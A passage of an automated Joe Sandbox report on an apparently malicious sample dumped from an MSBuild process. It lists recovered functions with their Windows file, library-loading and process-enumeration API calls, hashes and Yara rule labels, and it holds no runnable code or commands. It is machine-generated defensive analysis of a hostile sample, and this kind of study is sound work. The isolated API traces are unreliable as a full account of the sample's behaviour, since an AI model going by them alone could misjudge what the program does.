                                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2445788494-0
                                                                                                                                            • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                            • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                            Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3150196962-0
                                                                                                                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                            Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: malloc
                                                                                                                                            • String ID: failed to allocate %u bytes of memory
                                                                                                                                            • API String ID: 2803490479-1168259600
                                                                                                                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                            Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0041BDDF
                                                                                                                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmpmemset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1065087418-0
                                                                                                                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                            Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1381354015-0
                                                                                                                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                            Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                            • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                            • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                            • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                            • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                            Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                            Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2154303073-0
                                                                                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                            Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3150196962-0
                                                                                                                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                            Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$PointerRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3154509469-0
                                                                                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                            Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4232544981-0
                                                                                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                            Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                            Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$FileModuleName
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3859505661-0
                                                                                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                            Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                            Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                            Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                            Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                            Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                            Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??3@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 613200358-0
                                                                                                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                            Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
